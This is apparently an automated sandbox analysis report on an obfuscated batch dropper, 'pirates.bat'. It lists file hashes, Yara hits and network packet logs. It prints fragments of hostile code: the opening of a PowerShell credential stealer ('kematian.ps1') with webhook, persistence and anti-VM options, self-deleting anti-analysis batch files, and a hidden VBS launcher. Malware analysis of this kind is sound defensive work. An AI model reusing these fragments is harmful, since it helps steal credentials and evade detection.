                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw.*...J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u..*.O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.

                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):0.017262956703125623
                                        Encrypted:false
                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                        Malicious:false
                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\Desktop\kdotAqIoB.bat

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                        C:\Users\user\Desktop\kdotPUzdp.bat

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                        C:\Users\user\Desktop\kdotfQjio.bat

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                        C:\Users\user\Desktop\kdotkccaDE.bat

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                        C:\Users\user\Desktop\kdotljBUkx.bat

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                        C:\Users\user\Desktop\kdotmZyXn.bat

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                        C:\Users\user\Desktop\kdotnqUTZ.bat

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                        C:\Users\user\Desktop\kdotqzBNDv.bat

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                        C:\Users\user\Desktop\kdottNmtN.bat

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                        C:\Users\user\Desktop\kematian.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (4083), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):75913
                                        Entropy (8bit):5.3213810718350105
                                        Encrypted:false
                                        SSDEEP:1536:oSDVn5ahg5yYp6zdv/5l05Qo8l01zhwZPhZcLcJS7srHX6Cd:oSDVn5Uwiv/5IQo8l01zhw5hUc9KCd
                                        MD5:A8631654ACF90D83ADC4681D485BF3E5
                                        SHA1:90E48EB01E19EA218362C1F882F776B363D05D6A
                                        SHA-256:5687E23CA7E442EA12D71626F29F7822D3D4F1B105F839B173FA015E533B6736
                                        SHA-512:14758A43B65D5DAECE3F1781BAAFFCB19F00A40A0195D90ADE006F92A0C6A7A480DED0AC4CE890C24C878E14DC72FC93CDCFF3B85792CB1E5EFAC7C625619354
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\Desktop\kematian.ps1, Author: Joe Security
                                        • Rule: JoeSecurity_PowerShellScreenShot, Description: Yara detected PowerShell ScreenShot, Source: C:\Users\user\Desktop\kematian.ps1, Author: Joe Security
                                        Preview:#$webhook = "YOUR_URL_HERE_SERVER" ..#$debug = $false..#$blockhostsfile = $false..#$criticalprocess = $false..#$melt = $false..#$fakeerror = $false..#$persistence = $false..#$write_disk_only = $false..#$vm_protect = $false..#$encryption_key = "YOUR_ENC_KEY_HERE"..[Net.ServicePointManager]::SecurityProtocol = "Tls, Tls11, Tls12, Ssl3"....if ($debug) {.. $ProgressPreference = 'Continue'..}..else {.. $ErrorActionPreference = 'SilentlyContinue'.. $ProgressPreference = 'SilentlyContinue'..}....# Load WPF assemblies..Add-Type -AssemblyName PresentationCore, PresentationFramework, System.Net.Http, System.Windows.Forms, System.Drawing....# Critical Process..function CriticalProcess {.. param ([Parameter(Mandatory = $true)][string]$MethodName, [Parameter(Mandatory = $true)][uint32]$IsCritical, [uint32]$Unknown1, [uint32]$Unknown2).. [System.Diagnostics.Process]::EnterDebugMode() .. $domain = [AppDomain]::CurrentDomain.. $name = New-Object System.Reflection.AssemblyName('Dyn

                                        C:\Users\user\Desktop\temp.vbs

                                        Download File
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):84
                                        Entropy (8bit):4.762163220315799
                                        Encrypted:false
                                        SSDEEP:3:FER/1GXfeFH5Ot+WfWVMX4kfFvJFxAAov:FERtbFHIwvm9QAy
                                        MD5:E65308175E5D291D6731D37792EA8545
                                        SHA1:D92A69B072259E8CE61700E66A961DAB71BD211F
                                        SHA-256:CB822654C794AE9E336D73BE81D3BE5382BE09E139FDC35AAE69A6C3C5F33208
                                        SHA-512:5554E6107D8641402EC292845A8AD2B883E7412AA8C7D76B8067BE99EF3AB5B1F26FC87BB884259198F27BAACCF7E75A650C83F165A14664584DCD75CFACD2ED
                                        Malicious:true
                                        Preview:CreateObject("Wscript.Shell").Run "C:\Users\user\Desktop\pirates.bat", 0, True ..

                                        \Device\Null

                                        Download File
                                        Process:C:\Windows\System32\find.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):74
                                        Entropy (8bit):4.619352056366697
                                        Encrypted:false
                                        SSDEEP:3:ohAILCpIt+WfWVMX4kTHqn:ohOIwvmxKn
                                        MD5:DEBB460B2CE4BFF06C21EF014048B6D4
                                        SHA1:76E08CB0F4C4A89AEF2A026EA5253A1913D098D5
                                        SHA-256:B19036B9FC4DE141F9F4717423034203AA995BBE1408CE7FD2BF0DFAE7CD45DB
                                        SHA-512:F896199139CA59A724CDF7817D62BFAC60429349F090A43DEBEA2BB9F1159875BEE184ED077132542B9AF2931DFE4C4AB6AF0BBC9824CFD96862CFE703AD00A1
                                        Malicious:false
                                        Preview:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " ..

                                        Static File Info

                                        General

                                        File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                        Entropy (8bit):2.4495964738309257
                                        TrID:
                                        • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
                                        • Text - UTF-16 (LE) encoded (2002/1) 36.37%
                                        • MP3 audio (1001/1) 18.19%
                                        File name:pirates.bat
                                        File size:3'787'378 bytes
                                        MD5:cbcb58dabe241328f335d5710a7d5564
                                        SHA1:ca88012046bb818c24980b8d9c6fef0310dcd662
                                        SHA256:c87215ddba4bbda4ff1c9cf6a8d95012e42d3cecfeb1c22e65f7880e4102388b
                                        SHA512:6db0d757ea68705692262f9d9ad76d277dcbf407d63ae9215c425c7d3d620d240f4f26fe73fb22911a11f0a73de6e7de291b2058116bf59be097fee7d1246109
                                        SSDEEP:6144:eU0L7ReDkuXpOraQftcvIaJfFM9Cl5BpE0m6a9HKT6oJlwApWYcp/Z:I74Dkk+t8tpy9G09HHon8ZZ
                                        TLSH:5906BF21861CCE3A6395226904E91E0E2AC4CBC043761FDFFD6859C6677EF0726693DE
                                        File Content Preview:..%mpKriOjiN%>%GGkkkal%%yPikIOxCQ%n%ZMItFTB%%ELWoeLa%u%TmgOfBC%%rOAlToqBJ%l%BnIiEsSfL% %QpOlZgy%2%pGMUkpB%%GMvdcYp%>%UYIhfAMc%%LKgwjGiLo%&%ccCeCZf%%AqbTJFm%1%JHtIWNQ% %FrpswPR%&%JbZbtQH%%ZXFLaCUky%&%biJECTy% %SocAiiJOG%e%ojUbBtj%%zRqvcqbSO%x%qBRAHRL%%YdAg

                                        File Icon

                                        Icon Hash:9686878b929a9886

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 5, 2024 06:26:06.531177998 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:06.531224966 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:06.531295061 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:06.542431116 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:06.542447090 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.041973114 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.042074919 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.045623064 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.045643091 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.045923948 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.057264090 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.104499102 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.202990055 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.221538067 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.221555948 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.221612930 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.221638918 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.221685886 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.295720100 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.295738935 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.295800924 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.295823097 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.295849085 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.295877934 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.298392057 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.298408985 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.298459053 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.298472881 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.298495054 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.298511982 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.388679981 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.388705015 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.388747931 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.388770103 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.388789892 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.388818979 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.388823986 CEST44349730185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:07.388847113 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.388873100 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:07.412744045 CEST49730443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:29.622279882 CEST49737443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:29.622308969 CEST44349737104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:29.622379065 CEST49737443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:29.626208067 CEST49737443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:29.626219988 CEST44349737104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.125380993 CEST44349737104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.125508070 CEST49737443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.130045891 CEST49737443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.130064011 CEST44349737104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.130362988 CEST44349737104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.136507034 CEST49737443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.184492111 CEST44349737104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.265733957 CEST44349737104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.265825033 CEST44349737104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.265893936 CEST49737443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.267995119 CEST49737443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.304100037 CEST63770443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.304141998 CEST44363770104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.304229975 CEST63770443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.304616928 CEST63770443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.304635048 CEST44363770104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.782536983 CEST44363770104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.784148932 CEST63770443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.784169912 CEST44363770104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.926700115 CEST44363770104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.926775932 CEST44363770104.16.123.96192.168.2.4
                                        Jul 5, 2024 06:26:30.926829100 CEST63770443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.927222013 CEST63770443192.168.2.4104.16.123.96
                                        Jul 5, 2024 06:26:30.945823908 CEST6377180192.168.2.4208.95.112.1
                                        Jul 5, 2024 06:26:30.950701952 CEST8063771208.95.112.1192.168.2.4
                                        Jul 5, 2024 06:26:30.950824022 CEST6377180192.168.2.4208.95.112.1
                                        Jul 5, 2024 06:26:30.950978994 CEST6377180192.168.2.4208.95.112.1
                                        Jul 5, 2024 06:26:30.955740929 CEST8063771208.95.112.1192.168.2.4
                                        Jul 5, 2024 06:26:31.419663906 CEST8063771208.95.112.1192.168.2.4
                                        Jul 5, 2024 06:26:31.422158003 CEST6377180192.168.2.4208.95.112.1
                                        Jul 5, 2024 06:26:31.426989079 CEST8063771208.95.112.1192.168.2.4
                                        Jul 5, 2024 06:26:31.525300026 CEST8063771208.95.112.1192.168.2.4
                                        Jul 5, 2024 06:26:31.570112944 CEST6377180192.168.2.4208.95.112.1
                                        Jul 5, 2024 06:26:37.849798918 CEST63775443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:37.849836111 CEST44363775140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:37.849915981 CEST63775443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:37.852606058 CEST63775443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:37.852618933 CEST44363775140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:38.527287960 CEST44363775140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:38.527364016 CEST63775443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:38.528985023 CEST63775443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:38.528992891 CEST44363775140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:38.529221058 CEST44363775140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:38.535197020 CEST63775443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:38.580499887 CEST44363775140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:38.951947927 CEST44363775140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:38.952028036 CEST44363775140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:38.952094078 CEST44363775140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:38.952209949 CEST63775443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:38.952982903 CEST63775443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:38.961651087 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:38.961690903 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:38.961774111 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:38.962129116 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:38.962145090 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.431457996 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.431528091 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:39.433170080 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:39.433186054 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.433418989 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.434314966 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:39.476511955 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.579740047 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.579817057 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.579843044 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.579886913 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:39.579909086 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.579948902 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:39.580043077 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.580117941 CEST44363776185.199.110.133192.168.2.4
                                        Jul 5, 2024 06:26:39.580167055 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:39.580810070 CEST63776443192.168.2.4185.199.110.133
                                        Jul 5, 2024 06:26:54.240715981 CEST63777443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:54.240781069 CEST44363777140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:54.240988970 CEST63777443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:54.243410110 CEST63777443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:54.243427992 CEST44363777140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:54.907527924 CEST44363777140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:54.907604933 CEST63777443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:54.909018040 CEST63777443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:54.909025908 CEST44363777140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:54.909260988 CEST44363777140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:54.915211916 CEST63777443192.168.2.4140.82.121.3
                                        Jul 5, 2024 06:26:54.956512928 CEST44363777140.82.121.3192.168.2.4
                                        Jul 5, 2024 06:26:55.324431896 CEST44363777140.82.121.3192.168.2.4
